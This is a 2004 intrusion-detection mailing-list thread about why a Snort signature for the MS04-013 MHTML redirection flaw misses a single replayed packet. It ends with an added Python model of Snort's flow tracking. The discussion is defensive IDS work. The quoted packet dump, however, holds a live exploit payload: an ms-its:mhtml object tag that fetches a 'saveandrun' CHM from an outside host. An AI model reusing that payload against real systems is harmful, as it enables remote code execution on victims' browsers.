[Intrusions] mhtml signature
Affeld, James
JAffeld at sccd.ctc.edu
Thu Aug 5 00:58:58 GMT 2004
1) Since this signature is looking for misbehavior on the part of a web server, that misbehavior must be part of an established session. It is possible (though unusual) to include data with a client's SYN packet; I don't really see a way for a server to include it in the SYN-ACK. At least, not and have the data interact with a web browser. For this attack, the web server has to wait for a client's web browser to make a connection. The client then has to ask the web server to send it stuff; this takes part only in an established connection.
2) Nope, for the reasons discussed above.
That leaves the question of why Snort won't alert on the packet you captured with the 'flow:from_server,established;' as part of the signature. I wrote a similar rule for these vulnerabilities and included the 'flow' rule option, and the rule generates alerts when captured live, but not when read from the Snort binary log. Interestingly, sending the Snort binary log back on the wire with tcpreplay does not generate an alert. Obviously the signature worked the first time, because the binary log has the alert. I thought you had identified a neato bug for the good folks at Sourcefire, then I looked into the documentation. Section 2.6.9 of the manual says that the flow rule option is tied to TCP stream reassembly. It may be that a simple replay won't actually simulate the TCP session properly for the flow rules to fire.
http://www.snort.org/docs/snort_manual/node15.html#SECTION00369000000000000000
-----Original Message-----
From: lola marais [mailto:lola_marais at hotmail.com]
Sent: Wednesday, August 04, 2004 5:18 AM
To: intrusions at lists.sans.org
Subject: [Intrusions] mhtml signature
I have been working on a problem and require the assistance of the broader
list community.
Credit is given to the owner of this signature at
http://sourceforge.net/mailarchive/message.php?msg_id=7758516
I am planning on using this signature for a detect in part 2 of my GCIA
practical.
The problem is that I am not able to get it working 100% with the data that
I have. By not working I mean that it will miss the single packet that I
have captured.
I have captured some data from a network using tcpdump. The capture contains
the data content required to trigger the event. The capture contains a
single packet for that session, no more.
When I read the data past Snort with the signature enabled, then NO alerts
are triggered. If I remove the part of the signature
"flow:from_server,established" and then pass the same data, I have 1 event.
The signature looks for an established connection.
My question is:
1. Why has the author of the signature decided to look for an established
connection?
2. Does the signature stand a chance of missing some events by looking only
for established connections?
The current version of the signature has the following structure.
alert tcp any any -> $HOME_NET any (msg:"Microsoft MTHML URL Redirection
Attempt"; flow:from_server,established; content:"mhtml|3A|file|3A|"; nocase;
reference:cve,CAN-2004-0380;
reference:url,www.microsoft.com/technet/security/.../MS04-013.mspx;
classtype:web-application-attack; rev:2;)
The data packet that I have captured looks as follows:
07/28/04-11:23:51.262652 MAC:removed -> MAC:removed type:0x800 len:0xC2
Proxy:ProxyPort -> InternalHost:4003 TCP TTL:63 TOS:0x0 ID:33030 IpLen:20
DgmLen:176 DF
***AP**F Seq: 0xDC274ADF Ack: 0x2B3B3965 Win: 0xC1E8 TcpLen: 20
0x0000: 00 0A 42 42 80 0A 00 03 32 87 9A 71 08 00 45 00 ..BB....2..q..E.
0x0010: 00 B0 81 06 40 00 3F 06 2B 92 9E A9 83 0D 9E A6 ....@.?.+.......
0x0020: CE 52 1F 4C 0F A3 DC 27 4A DF 2B 3B 39 65 50 19 .R.L...'J.+;9eP.
0x0030: C1 E8 70 F3 00 00 20 20 20 20 3C 6F 62 6A 65 63 ..p...    <objec
0x0040: 74 20 64 61 74 61 3D 22 26 23 31 30 39 3B 73 2D t data="ms-
0x0050: 69 74 73 3A 6D 68 74 6D 6C 3A 66 69 6C 65 3A 2F its:mhtml:file:/
0x0060: 2F 43 3A 5C 66 6F 6F 2E 6D 68 74 21 68 74 74 70 /C:\foo.mht!http
0x0070: 3A 2F 2F 77 77 77 2E 66 72 65 65 33 32 2E 63 6F ://www.free32.co
0x0080: 6D 2F 50 4F 50 2E 43 48 4D 3A 3A 2F 73 61 76 65 m/POP.CHM::/save
0x0090: 61 6E 64 72 75 6E 2E 68 74 6D 22 20 74 79 70 65 andrun.htm" type
0x00A0: 3D 22 74 65 78 74 2F 78 2D 73 63 72 69 70 74 6C ="text/x-scriptl
0x00B0: 65 74 22 3E 3C 2F 6F 62 6A 65 63 74 3E 20 D1 7F et"></object> ..
0x00C0: CA 27 .'
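As an added illustration (not code from either message in this thread, and not Snort's own code): a toy Python model of the two checks the rule applies, the case-insensitive content match and the flow:from_server,established option. The flow tracker is a deliberate simplification of what a stream reassembler keeps: a session is "established" only after the SYN, SYN/ACK and ACK of the handshake have been seen, and the side that received the SYN is recorded as the server. The payload is a constructed string modelled on the captured packet above with the host name replaced by a placeholder, and the endpoints and port numbers are placeholders too. Feeding it only the lone ***AP**F packet reproduces the behaviour described in the post (no alert with the flow option, one alert without it); feeding it the handshake first makes both variants alert.

```python
# Added example, not code from the thread or from Snort: a toy model of how a
# flow-aware rule behaves on a single replayed packet versus a full TCP session.
import re
from dataclasses import dataclass

# TCP flag bits as they appear in the TCP header.
FIN, SYN, PSH, ACK = 0x01, 0x02, 0x08, 0x10


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: int
    payload: bytes = b""


class FlowTracker:
    """Minimal stand-in for a stream reassembler's session table (a simplification,
    not Snort's implementation).

    A flow becomes 'established' only after the SYN, SYN/ACK and final ACK of
    the three-way handshake have all been observed; the endpoint that received
    the SYN is recorded as the server.
    """

    def __init__(self):
        self._flows = {}  # frozenset of endpoints -> (state, server endpoint)

    @staticmethod
    def _key(p):
        return frozenset([(p.src, p.sport), (p.dst, p.dport)])

    def observe(self, p):
        k = self._key(p)
        state = self._flows.get(k)
        if p.flags & SYN and not p.flags & ACK:
            self._flows[k] = ("syn_sent", (p.dst, p.dport))
        elif p.flags & SYN and p.flags & ACK and state and state[0] == "syn_sent":
            self._flows[k] = ("syn_recv", state[1])
        elif p.flags & ACK and state and state[0] == "syn_recv":
            self._flows[k] = ("established", state[1])
        # Anything else (including a data packet on an unknown flow) leaves the
        # table unchanged: without the handshake there is no session to match.

    def from_server_established(self, p):
        state = self._flows.get(self._key(p))
        return bool(state) and state[0] == "established" and state[1] == (p.src, p.sport)


# content:"mhtml|3A|file|3A|"; nocase;  -> case-insensitive byte search
CONTENT = re.compile(rb"mhtml:file:", re.IGNORECASE)


def rule_fires(tracker, p, require_flow=True):
    """Apply the rule's content match and, optionally, its flow option."""
    tracker.observe(p)
    if not CONTENT.search(p.payload):
        return False
    if require_flow and not tracker.from_server_established(p):
        return False
    return True


# Constructed payload modelled on the captured packet; host name is a placeholder.
PAYLOAD = (b'    <object data="&#109;s-its:mhtml:file://C:\\foo.mht!'
           b'http://www.example.invalid/POP.CHM::/saveandrun.htm"'
           b' type="text/x-scriptlet"></object> ')

# Placeholder endpoints standing in for Proxy:ProxyPort -> InternalHost:4003.
SERVER, CLIENT = ("proxy", 8080), ("internalhost", 4003)


def data_packet():
    # ***AP**F: ACK, PSH and FIN set, as in the captured packet.
    return Packet(*SERVER, *CLIENT, ACK | PSH | FIN, PAYLOAD)


def handshake():
    return [
        Packet(*CLIENT, *SERVER, SYN),
        Packet(*SERVER, *CLIENT, SYN | ACK),
        Packet(*CLIENT, *SERVER, ACK),
    ]


def replay(packets):
    """Feed packets to a fresh tracker and report whether the rule fires on the
    last packet, once with the flow option and once without it."""
    results = {}
    for require_flow in (True, False):
        tracker = FlowTracker()
        fired = False
        for p in packets:
            fired = rule_fires(tracker, p, require_flow)
        results["with_flow" if require_flow else "without_flow"] = fired
    return results


def single_packet_replay():
    """The poster's case: the capture holds only the data packet."""
    return replay([data_packet()])


def full_session_replay():
    """The live case: handshake observed first, then the same data packet."""
    return replay(handshake() + [data_packet()])


if __name__ == "__main__":
    print("single packet:", single_packet_replay())  # flow option suppresses the alert
    print("full session :", full_session_replay())   # both variants alert
```

The point the model makes is the one the reply draws from the manual: the flow option is answered by session state, not by the bits in the packet in hand, so a capture that lacks the handshake can never satisfy "established" no matter how faithfully the single packet is replayed.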